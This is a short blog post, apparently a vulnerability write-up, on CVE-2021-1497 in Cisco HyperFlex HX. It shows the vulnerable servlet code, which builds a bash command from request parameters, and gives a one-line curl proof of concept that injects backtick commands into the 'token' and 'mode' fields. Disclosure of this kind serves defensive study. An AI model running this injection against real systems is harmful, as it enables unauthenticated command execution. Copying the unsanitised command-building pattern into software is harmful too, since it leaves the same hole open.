Post

Cisco Hyperflex Hx Storfs Asup Remote Command Execution Vulnerability Cve 2021 1497

Posted Updated
By Rhy0z
1 min read
Cisco Hyperflex Hx Storfs Asup Remote Command Execution Vulnerability Cve 2021 1497

Cisco HyperFlex HX storfs-asup Remote Command Execution Vulnerability CVE-2021-1497

Vulnerability Description

Cisco fixes two Unauth RCE and an arbitrary file upload in the HyperFlex HX data platform discovered by researchers Nikita Abramov and Mikhail Klyuchnikov

Vulnerability Impact

Cisco HyperFlex HX

Vulnerability reappears

Code with vulnerability

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

 protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String action = request.getParameter("action");
    if (action == null) {
      String msg = "Action for the servlet need be specified.";
      writeErrorResponse(response, msg);
      return;
    }
    try {
      String token = request.getParameter("token");
      StringBuilder cmd = new StringBuilder();
      cmd.append("exec /bin/storfs-asup ");
      cmd.append(token);
      String mode = request.getParameter("mode");
      cmd.append("  ");
      cmd.append(mode);
      cmd.append("  > /dev/null");
      logger.info("storfs-asup cmd to run : " + cmd);
      ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() });
      logger.info("Starting the storfs-asup now: ");
      long startTime = System.currentTimeMillis();
      Process p = pb.start();
      InputStream errStream = p.getErrorStream();
      String errMsg = FileUtils.readToString(errStream);
      int exitCode = p.waitFor();
      long timeTaken = System.currentTimeMillis() - startTime;
      logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg);
      errStream.close();
      OutputStream outStream = p.getOutputStream();
      outStream.flush();
      outStream.close();
      if (exitCode != 0)
        throw new Exception(errMsg);
    } catch (IOException ex) {
      logger.error("Failed to generate asup: " + ex);
    } catch (Exception ie) {
      logger.error("Failed to run the /bin/storfs-asup command.");
    } finally {
      logger.info("Done executing asup command. ");
    }
  }

POC is

curl -v https://xxx.xxx.xxx.xxx/storfs-asup -d 'action=&token=`id`&mode=`id`'

img

This post is licensed under CC BY 4.0 by the author.